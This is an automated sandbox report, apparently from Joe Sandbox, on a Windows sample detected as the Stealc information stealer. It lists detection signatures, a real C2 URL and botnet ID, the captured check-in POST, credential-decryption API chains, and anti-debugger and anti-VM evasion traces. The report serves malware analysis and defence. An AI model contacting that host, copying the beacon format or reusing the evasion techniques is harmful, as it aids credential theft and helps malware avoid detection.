Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1533401
MD5: bf6de6e8d3ac5123b66ba93633affe66
SHA1: f5f047a51c8ffe5700542d6ea9517214d4f31725
SHA256: eb01ca908e0cad8310d771a3722cad18d9694c718c37ac5f363e476e1c1212de
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BF6DE6E8D3AC5123B66BA93633AFFE66)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration (extracted): {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1325704313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7500 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7500 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.670000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-14T17:18:15.099274+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49708 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.670000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00677240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00679AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00679B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00688EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00684910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00684570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00683EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49708 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  Host: 185.215.113.37  Connection: Keep-Alive  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE
  Host: 185.215.113.37
  Content-Length: 210
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Ascii (body, decoded from the report's raw hex dump):
  ------JJJDGIECFCAKKFHIIIJE
  Content-Disposition: form-data; name="hwid"

  8D51E3B1064A563484146
  ------JJJDGIECFCAKKFHIIIJE
  Content-Disposition: form-data; name="build"

  doma
  ------JJJDGIECFCAKKFHIIIJE--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00674880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(#
Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37w

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A42033
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A47001
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094705F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3311C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4AB89
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A40391
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A34BF5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EB3E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009FBB1A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A39B28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A48B63
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097D410
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A455BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00933D8F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CF5FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A366EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3CE69
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006745C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: jmwhdghu ZLIB complexity 0.9950985609673024
Source: file.exe, 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1325704313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00689600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00683720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\HJC3KWHD.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1847296 > 1048576
Source: file.exe | Static PE information: Raw size of jmwhdghu is bigger than: 0x100000 < 0x19ce00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.670000.0.unpack :EW;.rsrc :W;.idata :W; :EW;jmwhdghu:EW;xkdnzbup:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;jmwhdghu:EW;xkdnzbup:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00689860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c72d0 should be: 0x1cb63c
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: jmwhdghu
Source: file.exe | Static PE information: section name: xkdnzbup
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B560B4 push eax; mov dword ptr [esp], ebx | 0_2_00B560E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B560B4 push 3A63A3CAh; mov dword ptr [esp], edi | 0_2_00B56104
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0E0A7 push eax; mov dword ptr [esp], edi | 0_2_00B0E0D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC40B0 push 3149E5B7h; mov dword ptr [esp], edi | 0_2_00AC40E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF208D push 3DD9B368h; mov dword ptr [esp], ebp | 0_2_00AF20C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF208D push 548164BCh; mov dword ptr [esp], esp | 0_2_00AF20D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB3886 push esi; mov dword ptr [esp], ebp | 0_2_00AB38B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB3886 push 072C594Fh; mov dword ptr [esp], ebp | 0_2_00AB3947
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE7083 push ebp; mov dword ptr [esp], edi | 0_2_00AE70AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE7083 push 295CA6DAh; mov dword ptr [esp], ecx | 0_2_00AE7124
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE7083 push 2905F284h; mov dword ptr [esp], eax | 0_2_00AE714A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5508D push ecx; mov dword ptr [esp], 341B7306h | 0_2_00B55101
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF6092 push ebp; mov dword ptr [esp], eax | 0_2_00AF60B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF6092 push esi; mov dword ptr [esp], 0DC895E2h | 0_2_00AF6147
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B2388C push 0EBC7D1Ch; mov dword ptr [esp], esi | 0_2_00B23923
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B2388C push 7FD5EC80h; mov dword ptr [esp], ebp | 0_2_00B23955
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B2388C push eax; mov dword ptr [esp], edi | 0_2_00B23980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068B035 push ecx; ret | 0_2_0068B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push ebp; mov dword ptr [esp], 7FEDCD03h | 0_2_00A3E90D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push eax; mov dword ptr [esp], edx | 0_2_00A3E96A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push ebp; mov dword ptr [esp], 3E77AF57h | 0_2_00A3E96F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push 5A556219h; mov dword ptr [esp], eax | 0_2_00A3E9E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push esi; mov dword ptr [esp], ebx | 0_2_00A3E9FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push 187109C1h; mov dword ptr [esp], eax | 0_2_00A3EA09
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push 7B374E98h; mov dword ptr [esp], esi | 0_2_00A3EA26
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push edx; mov dword ptr [esp], ebx | 0_2_00A3EA7B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push edx; mov dword ptr [esp], 1131DA9Eh | 0_2_00A3EB1F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push 6CD54B8Ch; mov dword ptr [esp], eax | 0_2_00A3EB45
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push 3C6801DFh; mov dword ptr [esp], ebp | 0_2_00A3EBB3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push edx; mov dword ptr [esp], eax | 0_2_00A3EC56
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E8C8 push eax; mov dword ptr [esp], esp | 0_2_00A3EC67
Source: file.exe | Static PE information: section name: jmwhdghu entropy: 7.9544342173463365

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00689860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13585
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8D2291 second address: 8D2296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8D2296 second address: 8D229C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8D229C second address: 8D22A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8D22A0 second address: 8D22A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4F468 second address: A4F474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0B44BD79ACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A46B39 second address: A46B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C82h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A46B4F second address: A46B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A46B53 second address: A46B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A46B60 second address: A46B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A46B66 second address: A46B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4E493 second address: A4E4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0B44BD79A6h 0x0000000a popad 0x0000000b jmp 00007F0B44BD79AAh 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F0B44BD79A6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4E4B2 second address: A4E4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4E4B6 second address: A4E4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4E613 second address: A4E62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C87h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4E7B4 second address: A4E7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4E7B8 second address: A4E7C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B44EA8C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4EA91 second address: A4EAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0B44BD79A6h 0x0000000a popad 0x0000000b jg 00007F0B44BD79B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A52770 second address: A5277A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0B44EA8C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A527F5 second address: A52813 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B44BD79A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0B44BD79ADh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A52813 second address: A52817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A52817 second address: A5281D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5281D second address: A52858 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B44EA8C78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or dword ptr [ebp+122D209Eh], eax 0x00000011 or dword ptr [ebp+122D2C9Ah], ecx 0x00000017 push 00000000h 0x00000019 xor dword ptr [ebp+122D2C1Bh], edi 0x0000001f call 00007F0B44EA8C79h 0x00000024 jmp 00007F0B44EA8C7Ah 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push edx 0x0000002f pop edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52858 second address: A5285C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5285C second address: A52862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B01 second address: A52B2E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0B44BD79ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop esi 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0B44BD79AEh 0x0000001e rdtsc
